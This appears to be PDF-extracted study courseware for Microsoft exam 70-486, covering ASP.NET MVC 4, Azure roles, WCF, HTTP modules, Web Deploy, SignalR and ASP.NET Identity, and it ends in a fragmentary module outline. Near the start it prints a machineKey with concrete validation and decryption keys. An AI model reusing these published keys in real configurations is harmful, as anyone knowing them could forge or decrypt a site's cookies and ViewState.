decryptionKey="AutoGenerate,IsolateApps" [String=""
validation="HMACSHA256" [SHA1="" | MD5="" | 3DES="" | AES="" | HMACSHA256=""
HMACSHA384="" | HMACSHA512="" | alg:algorithm_name="" decryption="Auto"
[Auto="" | DES="" | 3DES="" | AES="" | alg:algorithm_name=""] />
Use separate key values for each application, but duplicate

each applications keys across all servers in the farm
<machineKey
validationKey="32E35872597989D14CC1D5D9F5B1E94238D0EE32CF10AA2D2059533DF6035F4F"
decryptionKey="B179091DBB2389B996A526DE8BCD7ACFDBCAB04EF1D085481C61496F693DF5F4"
/>
machineKey Element (ASP.NET Settings Schema)
http://msdn.microsoft.com/en-us/library/vstudio/w8h3skw9(v=vs.100).aspx
12
13. 1
Modules 13
Using Windows Azure Web Services in
Web Applications
Using Windows Azure Web Services
13. 2
Contents
Exam Topic: Debug a Windows Azure application
Collect diagnostic information by using Windows Azure Diagnostics API Implement on
demand vs. scheduled
Choose log types, for example, event logs, performance counters, and crash dumps
Debug a Windows Azure application by using IntelliTrace and Remote Desktop
Protocol (RDP)
Exam Topic: Design and implement the Windows Azure role life cycle
Identify and implement Start, Run, and Stop events
Identify startup tasks (IIS configuration [app pool], registry
configuration, third-party tools)
Review 20480.C.Cross.Domain.Requests
13. 3
MOC Errata
Page 13-12
The MOC slide says
For the second reference (for the staging environment), it

should say
http://<guid>.cloudapp.net/<servicename>.svc
Windows Azure
13. 4
Install the Windows Azure SDK
Windows Azure
13. 5
Install the Windows Azure SDK

What gets installed:
Windows Azure
13. 6
Remote Desktop (RDP)

By using the Windows Azure SDK and Remote Desktop
Services, you can access Windows Azure roles and
virtual machines that are hosted by Windows Azure
Set up a certificate so that you can encrypt credentials
information
The certificates that you need for a remote desktop connection
are different from the certificates that you use for other
Windows Azure operations
The remote access certificate must have a private key which
should be exported as a PFX file
Using Remote Desktop with Windows Azure Roles

http://msdn.microsoft.com/en-us/library/windowsazure/gg443832.aspx
13. 7
Windows Azure
Startup Tasks
You can use startup tasks to perform operations before
a role starts
Operations that you might want to perform include installing a
component, registering COM components, setting registry keys,
or starting a long running process
Startup tasks are defined in the ServiceDefinition.csdef file
<Startup>
<Task commandLine="Startup.cmd"
executionContext="limited" taskType="simple" >
<Environment>
<Variable name="MyVersionNumber" value="1.0.0.0" />
</Environment>
</Task>
</Startup>
Run Startup Tasks in Windows Azure

http://msdn.microsoft.com/en-us/library/windowsazure/hh180155.aspx
13. 8
Windows Azure
RoleEntryPoint and RoleEnvironment Events

When you create Windows Azure projects each role will
have a WebRole.cs or WorkerRole.cs
Derives from RoleEntryPoint which has three methods you can
override: OnStart, OnStop, Run
Can handle events on RoleEnvironment class
Changed, Changing: if the configuration is changed
StatusCheck, Stopping
public class WebRole : RoleEntryPoint
{
public override bool OnStart()
{
RoleEnvironment.Changing
+= RoleEnvironment_Changing;
return base.OnStart();
void RoleEnvironment_Changing(
object sender,
RoleEnvironmentChangingEventArgs e)
{
Log(e.Changes);
e.Cancel = true;
Leveraging the RoleEntryPoint

http://brentdacodemonkey.wordpress.com/2011/09/24/leveraging-the-roleentrypoint-year-of-azure-week-12/
WCF Services
13. 9
Format of Returned Data

Before .NET 4 it defaults to XML but can be overridden
[OperationContract]
[WebGet(ResponseFormat = WebMessageFormat.Json)]
public long Mod(long x, long y);
With .NET 4 you can set it automatically

<webHttpEndpoint>
<standardEndpoint name="" helpEnabled="true"
automaticFormatSelectionEnabled="true"/>
When enabled the WCF infrastructure will try to

determine the appropriate response format using
1. The value of the HTTP Accept header of the request
2. The content-type of the request
3. The default response format for the operation
WCF Services
13. 10
ChannelFactory / WebChannelFactory (1/2)

Channel factories can be used to dynamically create a
channel (i.e. proxy) if you do not have one
But you will need a reference to the assembly that defines the
contracts i.e. interfaces (this is why its good to separate
interfaces from implementation)
WebChannelFactory automatically adds the WebHttpBehavior
and WebHttpBinding if they are missing to allow HTTP GETs
How to define an endpoint and proxy programmatically

Create an address that points to the service
var address = new EndpointAddress(
"http://localhost/MathSite/MathService.svc");
Create a binding
var binding = new WSHttpBinding();
13. 11
WCF Services
ChannelFactory / WebChannelFactory (2/2)

Create a ChannelFactory (proxy builder) for the service
contract (the interface IMath), binding and address
var cf = new ChannelFactory<IMath>(binding, address);
Use the channel factory to create a channel (proxy) for the

service and then call its methods
IMath mathService = cf.CreateChannel();
double s = mathService.Add(3, 39);
When finished, close the proxy and dispose of the factory

(mathService as IClientChannel).Close();
cf.Dispose();
13. 12
Data Contracts
Serializing Object References

DataContractSerializer serializes by value (default)
[DataMember] public Address BillTo = someAddress;
[DataMember] public Address ShipTo = someAddress;
<BillTo>contents of someAddress</BillTo>
<ShipTo>contents of someAddress</ShipTo>
To get the DataContractSerializer to preserve object

references (especially useful for circular references)
[DataContract(IsReference=true)]
public class Order
[DataContract(IsReference=true)]
public class Address
<BillTo id="1">contents of someAddress</BillTo>

<ShipTo ref="1" />
Interoperable Object References
http://msdn.microsoft.com/en-us/library/cc656708.aspx
DataContract Serializer and IsReference property

http://zamd.net/2008/05/20/datacontract-serializer-and-isreference-property/
Data Contracts
13. 13
Resource Description Framework (RDF)

RDF is a standard model for data interchange on the
Web
RDF has features that facilitate data merging even if the
underlying schemas differ, and it specifically supports the
evolution of schemas over time without requiring all the data
consumers to be changed
RDF extends the linking structure of the Web to use URIs to
name the relationship between things as well as the two ends of
the link
Resource Description Framework (RDF)

http://www.w3.org/RDF/
14. 1
Module 14
Implementing Web APIs in
Web Applications
14. 2
MOC Errata
Page 14-10
The MOC says NoAction in multiple sentences
It should say NonAction
[NonAction]
public void DoSomething()
{
Exam Topic: none
14. 3
HTTP and REST
POST versus PUT

The actual function performed by the POST method is
determined by the server and POST is designed to allow a
uniform method to cover the following functions: []
Extending a database through an append operation
So POST can be used to insert and the server should respond
with 201 (Created), or POST can be used for any meaning
PUT If the Request-URI refers to an already existing resource,
the enclosed entity SHOULD be considered as a modified version
of the one residing on the origin server. If the Request-URI does
not point to an existing resource, and that URI is capable of
being defined as a new resource by the requesting user agent,
the origin server can create the resource with that URI
So PUT can be used to insert or update and the server should
respond with either 201 (Created) or 200 (OK) or 204 (No
content)
Method Definitions
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
14. 4
HTTP and REST
Designing the URIs

Choose common sense URIs so developers can quickly
work out how to access any resource and your service
becomes almost self-documenting
Design your service API as if you were designing the URLs for a
web site i.e. make them logical enough that an end user could
work out how to use them if shown a few examples
Task
HTTP Method
Relative URI
Retrieve all entities
GET
/api/orders
Retrieve single entity
GET
/api/orders/id
Retrieve by custom
GET
/api/orders?category=category
Create new entity
POST
/api/orders
Update entity
PUT
/api/orders/id
Remove entity
DELETE
/api/orders/id
15. 1
Module 15
Handling Requests in ASP.NET
Web Applications
Handling Requests in ASP.NET MVC 4 Web Applications
15. 2
Contents
Exam Topic: Design and implement a Web Socket strategy
Read and write string and binary data asynchronously (long-running data transfers)
Choose a connection loss strategy
Decide a strategy for when to use Web Sockets
Exam Topic: Design HTTP modules and handlers
Implement synchronous and asynchronous modules and handlers
Choose between modules and handlers in IIS
Exam Topic: Control application behavior by using MVC extensibility points
Control application behavior by using action results, viewengines, model
binders, and route handlers
From the 20480 HTML5 course review the following

20480.13.Web.Sockets
Lab
Do NOT use the pre-release version of SignalR as described in
the lab, use the most recent version
HTTP Modules
15. 3
Implementing
HTTP handlers only process requests for file extensions
they are registered for; if you want to process all
requests, use an HTTP module instead
Create a class that implements IHttpModule
public class MyModule : IHttpModule
Implement Init method and add handlers for any events you
want to intercept
public void Init(HttpApplication a)
{
this.app = a;
this.app.BeginRequest += LogAllRequestsMethod;
HTTP Modules
15. 4
Configuring
HTTP module must be registered in .config
For IIS 6.0 or IIS 7.0 in Classic mode
<system.web>
<httpModules>
<add name="MyMod" type="MyNamespace.MyModule" />
For IIS 7.0 in Integration mode

<system.webServer>
<modules>
<add name="MyMod" type="MyNamespace.MyModule"
precondition="managedHandler"/>
The precondition causes the module to be invoked only for

requests to the ASP.NET application resources, such as .aspx
files or managed handlers (excludes static files like .htm)
How to: Configure the <system.webServer> Section for IIS 7.0
http://msdn.microsoft.com/en-us/library/bb763179.aspx
15. 5
HTTP Modules
Ordering
Order modules are
processed is defined in
.config file
Order of events
(non-deterministic)
Order of events
(sequential)
BeginRequest
AuthenticateRequest
AuthorizeRequest
PreSendRequestHeaders
ResolveRequestCache
PreSendRequestContent
AcquireRequestState
Error
PreRequestHandlerExecute
PostRequestHandlerExecute
ReleaseRequestState
UpdateRequestCache
EndRequest
HTTP Modules
15. 6
HTTP Message Handlers

A message handler is a class that receives an HTTP
request and returns an HTTP response
Typically, a series of message handlers are chained together, so
they act more like HTTP modules than HTTP handlers!
If a delegating handler creates the
response without calling
base.SendAsync, the request skips
the rest of the pipeline
This can be useful
for a handler that
validates the request
(creating an error
response)
HTTP Message Handlers

http://www.asp.net/web-api/overview/working-with-http/http-message-handlers
15. 7
HTTP Modules
HTTP Message Handlers Example

public class MethodOverrideHandler : DelegatingHandler
{
readonly string[] _methods = { "DELETE", "HEAD", "PUT" };
const string _header = "X-HTTP-Method-Override";
protected override Task<HttpResponseMessage> SendAsync(
HttpRequestMessage request, CancellationToken cancellationToken)
{
if (request.Method == HttpMethod.Post && request.Headers.Contains(_header))
{
var method = request.Headers.GetValues(_header).FirstOrDefault();
if (_methods.Contains(method, StringComparer.InvariantCultureIgnoreCase))
{
request.Method = new HttpMethod(method);
}
}
var response = base.SendAsync(request, cancellationToken);
return response;
} // for clients that cannot send certain HTTP request types,
}
// such as PUT or DELETE
using System.Net.Http;
using System.Threading;
using System.Threading.Tasks;
Extending MVC
15. 8
Interfaces and Classes

Interfaces and classes
IActionFilter: OnActionExecuting, OnActionExecuted methods
IController (Controller): Execute method
IRouteHandler (MvcRouteHandler, PageRouteHandler):
GetHttpHandler method
Use RouteTable.Routes.Add and pass in the instance of Route
or RouteBase instead of using MapRoute
IRouteConstraint (HttpMethodConstraint): Match method
16. 1
Module 16
Deploying ASP.NET MVC 4
Web Applications
Web Applications
Deploying ASP.NET MVC 4 Web Applications
16. 2
Contents
Topic
Slide
Web Deploy
ASP.NET Command Line Tools
Managing a Web AppDomain
Web.config Transformations
11
IIS
13
Common Ports
16
Exam Topic: Design a distributed application

Design a hybrid application (on premise vs. off premise, including Windows Azure)
Plan for session management in a distributed environment
Plan web farms
Web Deploy
16. 3
Overview
For any question about deployment tools, the answer is
almost always use Web Deploy because
It works securely
It is powerful and flexible by changing the web publish pipeline
You can install SSL certificates using a custom target
Only choose to use FTP, XCopy, VPN, SSH, and so on if

you have a very good reason
Web Deploy
16. 4
Packages
IIS Settings
Application Pool
Authentication method
Error Handling
Deploy Database Scripts
Production Settings
Release / Debugging
Connection Strings
Capable of Custom Extensions

Security Certificates
Windows Registry Settings
Assemblies in Global Assembly Cache (GAC)
16. 5
Web Deploy
Publishing Pipeline
Build
Collect
Transform
Web Deploy
Package /
Publish
Build
Collect binary
and .pdb files
Transform
web.config
Collect GAC, COM,

Registry settings
Create
package or
publish
Collect
references
Exclude files
Collect IIS settings
Collect
content
Precompile
Collect SSL
Certificates
Create SQL scripts
Create manifest
Custom extensions
16. 6
Web Deploy
Importing Package into IIS
Parameters.xml
Web Deploy
Package.zip
IIS Provider
IIS
Database
Provider
Database
Web Content
Provider
Web content
Other
Other
Providers
Other
Providers
Providers
Your custom
Provider
COM
GAC
Custom Asset
16. 7
ASP.NET IIS Registration Tool

aspnet_regiis.exe: ASP.NET/IIS configuration
Can be used to customize script maps
-lv: list status and paths of all versions of ASP.NET installed
-i: installs ASP.NET
-u: uninstalls ASP.NET; -ua: uninstalls all versions of ASP.NET
-pef section webApplicationDirectory: encrypts section
-pdf section webApplicationDirectory: decrypts section

-pe section pkm: encrypts section in Machine.config
-pd section -pkm: decrypts section in Machine.config
and many more!
16. 8
ASP.NET SQL Server Registration Tool

aspnet_regsql.exe
Application services: Membership (m), Role Manager (r), Profile
(p), Web Parts Personalization (c), Web Events (w)
-A all, -A p , -A mcw: add service(s)
-R all, -R p , -R mcw: remove service(s)
SQL cache dependency: SQL Server 7.0 or later
-d <database> ed/dd: enable/disable database
-t <table> -et/dt: enable/disable table
Session state (uses tempdb by default)
-d <database> -ssadd: adds support
-d <database> -ssremove: removes support
16. 9
Taking a Web Project Offline

To take a web project temporarily offline
Create a file named app_offline.htm in the root of a web site
The AppDomain will be unloaded and the contents of the static
file displayed instead of any response
Warning! Your site will return 503 Server Unavailable
Warning! Versions of Internet Explorer older than 8.0 give a
missing file error with small app_offline.htm files, so add about
a screen full of HTML comments to make it big enough (it must
be more than 512 bytes)
You can also use an entry in .config

This is what the WSAT tool does to take an application offline
<httpRuntime enable="false" />
16. 10
What Causes a Web Site to Restart?

Changes to
Machine.config
Web.config(s)
Global.asax
Contents of /bin
Directory is renamed
Excessive recompilations for a page when using

dynamically-recompiled web sites (defaults to 15)
Changes to Code Access Security (CAS) policy files
16. 11
Changing and Removing Attributes

Web.config
<connectionStrings>
<add name="MyDB"
connectionString="Data Source=TestServer;..."
<system.web>
<compilation debug="true"
Web.Release.config
<connectionStrings>
<add name="MyDB"
connectionString="Data Source=ProductServer;..."
xdt:Transform="SetAttributes" xdt:Locator="Match(name)"
<system.web>
<compilation xdt:Transform="RemoveAttributes(debug)" />
16. 12
Replacing Elements
Web.config
<customErrors defaultRedirect="Error.aspx"
mode="RemoteOnly">
<error statusCode="500" redirect="ServerError.htm" />
Web.Debug.config
<customErrors defaultRedirect="DetailedError.aspx"
mode="Off" xdt:Transform="Replace">
<error statusCode="500" redirect="InternalError.htm" />
16. 13
IIS
Web Farms and Web Gardens

A web farm is when you have multiple physical servers
A web garden is when you have multiple processes in
an application pool
16. 14
IIS
ASP.NET Integration with IIS 7

IIS 7 supports both the old and the new modes
Can be used side by side on the same server in different
application pools
Classic
Integration
ASP.NET Integration with IIS 7

http://learn.iis.net/page.aspx/243/aspnet-integration-with-iis/
16. 15
IIS
Migrating
ASP.NET operates in Integrated mode by default
Because of the configuration unification, some applications may
require migration to operate properly in Integrated mode
The following configurations cause a migration error

<httpModules>: ASP.NET modules must be specified with native
modules in the unified <system.webServer>/<modules>
<httpHandlers>: ASP.NET handler mappings must be specified in

the unified <system.webServer>/<handlers>
This replaces both the <httpHandlers> configuration and the
scriptmaps configuration, both of which previously had to be
configured to set up an ASP.NET handler mapping
<identity impersonate="true" />
If your application does not rely on impersonating the requesting user in the
BeginRequest and AuthenticateRequest stages (the only stages where impersonation is
not possible in Integrated mode), ignore this error by adding the following to your
applications web.config: <validation validateIntegratedModeConfiguration="false"
16. 16
Common Ports
Port
Description
21
FTP data transfer
22
Secure Shell (SSH) used for secure logins, file transfers (scp, sftp)
and port forwarding
23
Telnet protocolunencrypted text communications
25
Simple Mail Transfer Protocol (SMTP)used for e-mail routing

between mail servers
53
Domain Name System (DNS)
79
Finger protocol
80
Hypertext Transfer Protocol (HTTP)
88
Kerberosauthentication system
443
Hypertext Transfer Protocol over TLS/SSL (HTTPS)
666
Doom, first online first-person shooter
List of TCP and UDP port numbers

http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
A. 1
Appendix A
Whats New in Visual Studio 2013
and Updated Exam
Web Applications
A. 2
Contents
Topic
SignalR
Slide
4
Filters
Browser Testing
10
ASP.NET Identity
11
Token Formats
17
Azure Caching
18
Exam Topics: Design and implement a Web Socket strategy

Implement SignalR
Exam Topics: Design and implement MVC controllers and actions
Apply authentication filters
Specify an override filter
A. 3
Contents
Exam Topics: Test a web application
Create and run web tests (including using Browser Link)
Debug a web application in multiple browsers and mobile emulators
Exam Topics: Debug a Windows Azure application
Debug a Windows Azure application by using remote debugging
Interact directly with remote Windows Azure websites using Server Explorer
Exam Topics: Configure authentication
Configure ASP.NET Identity
Exam Topics: Design and implement claims-based authentication
across federated identity stores
Handle token formats (for example, oAuth, OpenID, Microsoft Account,
Google, Twitter, and Facebook) for SAML and SWT tokens
Exam Topics: Design a caching strategy
Implement Azure caching
SignalR
A. 4
What Is SignalR 2.0?

Incredibly simple real-time web for .NET
Ability to have your server-side code push content to the
connected clients as it happens, in real-time
SignalR will use WebSockets under the covers when its
available, and gracefully fallback to other technologies when it
isnt, while your application code stays the same
Install it with NuGet

Install-Package Microsoft.AspNet.SignalR
Install a sample application

Install-Package Microsoft.AspNet.SignalR.Sample
Learn About ASP.NET SignalR

http://www.asp.net/signalr
A. 5
SignalR
Communication
SignalR provides a simple
API for creating server-toclient remote procedure
calls (RPC) that call
JavaScript functions in
client browsers from
server-side .NET code
SignalR
A. 6
Transport Selection Process

Steps that SignalR uses to decide which transport to use
If the browser is IE8 or earlier, Long Polling is used
If JSONP is configured (that is, the jsonp parameter is set to
true when the connection is started), Long Polling is used
If a cross-domain connection is being made then WebSocket will
be used if the client supports CORS and both support WebSocket
If JSONP is not configured and the connection is not crossdomain, WebSocket will be used if both the client and server
support it
If either the client or server do not support WebSocket, Server
Sent Events is used if it is available
If Server Sent Events is not available, Forever Frame is
attempted
If Forever Frame fails, Long Polling is used
A. 7
SignalR
Monitoring Transports
You can determine what transport your application is
using by enabling logging on your hub
$.connection.hub.logging = true;
You can request transport preferences

connection.start({ transport: ['webSockets','longPolling'] });
Tutorial: Getting Started with SignalR 2.0 and MVC 5

http://www.asp.net/signalr/overview/signalr-20/getting-started-with-signalr-20/tutorial-getting-started-with-signalr-20-and-mvc-5
A. 8
Filters
Authentication Filters
using System.Web.Mvc.Filters;
Applied prior to any Authorization filters

To create a custom authentication filter
public class BasicAuthAttribute : ActionFilterAttribute, IAuthenticationFilter
Implement two methods

// executed first and can be used to perform any needed authentication
public void OnAuthentication(AuthenticationContext filterContext)
public void OnAuthenticationChallenge(
AuthenticationChallengeContext filterContext)
{
// restrict access based upon the authenticated user's principal
var user = filterContext.HttpContext.User;
if (user == null || !user.Identity.IsAuthenticated)
{
filterContext.Result = new HttpUnauthorizedResult();
ASP.NET MVC 5 Authentication Filters

http://visualstudiomagazine.com/articles/2013/08/28/asp_net-authentication-filters.aspx
Filters
A. 9
Overriding Filters
We can exclude a specific action method or controller
from the global filter or controller level filter
OverrideAuthenticationAttribute,
OverrideAuthorizationAttribute, OverrideActionFiltersAttribute,
OverrideResultAttribute, OverrideExceptionAttribute
[Authorize(Users = "Admin")]
public class HomeController : Controller
{
public ActionResult Index() {
ViewBag.Message = "Welcome to ASP.NET MVC!";
return View();
}
[OverrideAuthorization]
public ActionResult About() {
return View();
}
Filter Overrides in ASP.Net MVC 5
http://www.c-sharpcorner.com/UploadFile/ff2f08/filter-overrides-in-Asp-Net-mvc-5/
Browser Testing
A. 10
Browser Link
A communication channel between the development
environment and one or more web browsers
Refresh your web application in several browsers at once, which
is useful for cross-browser testing
Use Ctrl to select multiple browsers for testing
To enable for static files

<system.webServer> <handlers>
<add name="Browser Link for HTML" path="*.html" verb="*"
type="System.Web.StaticFileHandler, System.Web,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
resourceType="File" preCondition="integratedMode" />
Using Browser Link in Visual Studio 2013
http://www.asp.net/visual-studio/overview/2013/using-browser-link
ASP.NET Identity
A. 11
History of Identity Management

ASP.NET Membership
Designed to solve site membership requirements that were
common in 2005
ASP.NET Simple Membership

Doesnt work well with existing ASP.NET Membership providers
ASP.NET Universal Providers

Built on EF Code First
The assumption that users will log in by entering a user

name and password that they have registered in your
own application is no longer valid
The ASP.NET Identity System

http://www.asp.net/identity
ASP.NET Identity
A. 12
Modernizing Identity Management

A modern membership system must enable redirectionbased log-ins to authentication providers such as
Facebook, Twitter, and others
ASP.NET Identity uses Entity Framework Code First to
implement all of its persistence mechanism
You can easily add social log-ins such as Microsoft Account,
Facebook, Twitter, Google, and others to your application, and
store the user-specific data in your application
ASP.NET authentication is now based on OWIN

middleware that can be used on any OWIN-based host
Introduction to ASP.NET Identity

http://www.asp.net/identity/overview/getting-started/introduction-to-aspnet-identity
ASP.NET Identity
A. 13
Registering
When the user clicks the Register
button, the Register action of the
Account controller creates the user by
calling the ASP.NET Identity API
// POST: /Account/Register
[HttpPost]
[AllowAnonymous]
[ValidateAntiForgeryToken]
public async Task<ActionResult> Register(RegisterViewModel model)
var user = new ApplicationUser() { UserName = model.UserName };
var result = await UserManager.CreateAsync(user, model.Password);
if (result.Succeeded)
{
await SignInAsync(user, isPersistent: false);
return RedirectToAction("Index", "Home");
ASP.NET Identity
A. 14
Signing In
If the user was successfully created, she is logged in by
the SignInAsync method
private async Task SignInAsync(ApplicationUser user, bool isPersistent)
{
AuthenticationManager.SignOut(DefaultAuthenticationTypes.ExternalCookie);
var identity = await UserManager.CreateIdentityAsync(
user, DefaultAuthenticationTypes.ApplicationCookie);
AuthenticationManager.SignIn(new AuthenticationProperties()
{ IsPersistent = isPersistent }, identity);
}
ASP.NET Identity and OWIN Cookie Authentication are claimsbased system so the framework requires the app to generate a
ClaimsIdentity for the user using CreateIndentityAsync
The code above signs in the user by using the
AuthenticationManager from OWIN and calling SignIn and
passing in the ClaimsIdentity
ASP.NET Identity
A. 15
Components
Packages in green make up the ASP.NET Identity system
All the other packages are dependencies which are needed to
use the ASP.NET Identity system in ASP.NET applications
ASP.NET Identity
A. 16
Tutorial
MVC 5 with Google and Facebook authentication
This tutorial shows you how to build an ASP.NET MVC 5 web
application that enables users to log in using OAuth 2.0 or
OpenID with credentials from an external authentication
provider, such as Facebook, Twitter, Microsoft, or Google
For simplicity, this tutorial focuses on working with credentials
from Facebook and Google
Enabling these credentials in your web sites provides a
significant advantage because millions of users already have
accounts with these external providers
These users may be more inclined to sign up for your site if they
do not have to create and remember a new set of credentials
The tutorial also shows how to add profile data for the user, and
how to use the Membership API to add roles
Code! MVC 5 App with Facebook, Twitter, LinkedIn and Google OAuth2 Sign-on
http://www.asp.net/mvc/tutorials/mvc-5/create-an-aspnet-mvc-5-app-with-facebook-and-google-oauth2-and-openid-sign-on
Token Formats
A. 17
Supported in ACS
ACS can issue security tokens in the following formats
Security Assertion Markup Language (SAML) 1.1 and 2.0
<assertion id="_4fe09cda-cad9-49dd-b493-93494e1ae4f9"
issueinstant="2012-09-18T20:42:11.626Z"
version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
<issuer>https://test05.accesscontrol.windows.net/</issuer>
Simple Web Token (SWT)

Audience=http%3a%2f%2flocalhost%2fmyservice&ExpiresOn=1255913549
Issuer=https%3a%2f%2fmyservice.accesscontrol.windows.net%2f&role
=Admin%2cUser&role=Admin%2cUser&&HMACSHA256=sT7Hr9z%2b3t1oDFLpq5
GOToVsu6Dyxpq7hHsSAznmwnI%3d
JSON Web token (JWT)
Token Formats Supported in ACS

http://msdn.microsoft.com/en-us/library/gg185950.aspx
Microsoft Azure Caching
A. 18
Implementing
Build highly responsive applications using a distributed
cache that scales independently from your application
using Microsoft.ApplicationServer.Caching;
DataCache cache = new DataCache("default");
// Add the string "value" to the cache, keyed by "item"
cache.Add("item", "value", TimeSpan.FromMinutes(30));
DataCacheItem item = cache.GetCacheItem("item");
TimeSpan timeRemaining = item.Timeout;
Cache
http://azure.microsoft.com/en-us/documentation/services/cache/
How to Use Azure Cache Service

http://azure.microsoft.com/en-us/documentation/articles/cache-dotnet-how-to-use-service/

MCSD Web Applications Asp Net Courseware PDF

Uploaded by

MCSD Web Applications Asp Net Courseware PDF

Uploaded by

Microsoft

MCSD: 70-486: Developing

Updated 11th April 2014

70-486 Exam Guide to Ratio of Questions

Microsoft Exam 70-486 Study Guide

Estimate of Number of Exam Questions per Module

1: Exploring ASP.NET MVC 4 & 2: Designing ASP.NET MVC 4 Web Applications

3: Developing ASP.NET MVC 4 Models

4: Developing ASP.NET MVC 4 Controllers

5: Developing ASP.NET MVC 4 Views

6: Testing and Debugging ASP.NET MVC 4 Web Applications

7: Structuring ASP.NET MVC 4 Web Applications

8: Applying Styles to ASP.NET MVC 4 Web Applications

9: Building Responsive Pages in ASP.NET MVC 4 Web Applications

11: Controlling Access to ASP.NET MVC 4 Web Applications

12: Building a Resilient ASP.NET MVC 4 Web Application

14: Implementing Web APIs in ASP.NET MVC 4 Web Applications

15: Handling Requests in ASP.NET MVC 4 Web Applications

16: Deploying ASP.NET MVC 4 Web Applications

Total questions in exam

Database for labs 3 to 16 (e.g. position 5, 9295)

Lab 1: Web Sites are different from Projects

Lab 3 (position 5, 7923)

Lab 3 (position 5, 8970)

install-package EntityFramework version 5.0.0.0

In ASP.NET ~ (tilde) means root of web application

For Real-World Prototyping/Intranets (not on exam)

ASP.NET Dynamic Data Entities Web Application

Run the web application!

Updated 11th April 2014

Designing ASP.NET MVC 4 Web Applications

Exam Topic: Plan the application layers

Exam Topic: Plan and implement globalization and localization

Data Repository is a faade

Data Mapper pattern

Uses ModelBinders to map incoming parameters

Web Configuration Hierarchy

<system.web>

<system.webServer>

IIS 7 or later is at: \Windows\System32\inetsrv\config\ApplicationHost.config

External Configuration Sources

Using the ASP.NET Intrinsic Objects

HttpContext and Some of Its Properties

Using the ASP.NET Intrinsic Objects

Session (store state for user session)

Using the ASP.NET Intrinsic Objects on HttpContext

What are They?

If we dont explicitly warn MVC not to route anything

ISO defines codes for language-region

uiCulture code can be neutral (language only)

Browser Requests Language Preference

Each language-range MAY be given an associated quality value

would mean: I prefer Danish, but will accept British English

14 Header Field Definitions

Create a class library with .resx files and load in views

ASP.NET MVC 3 Internationalization

RESX Files, Satellite Assemblies, and Thread Culture

Set globalization so that the thread executing the view

Loading from Resource Files

Resx Files In App_GlobalResources

When the value is set on the body tag, frames and

Common Verbs in English, Spanish, French

Windows Azure Conference

Updated 11th April 2014

Developing ASP.NET MVC 4 Models

It should have said

Page 03-14 (position 5, 4588)

[Display(Name = "First Name")]

[DisplayName("First Name")]: used by label

[HiddenInput] public Guid ID { get; set; }

[HiddenInput]: invisible to user but posted with form

Validation Metadata Annotations

Create a class with a static method

Apply attribute to a property on your model

Using a Partial Class to Apply Metadata

Maps the following types to a browser request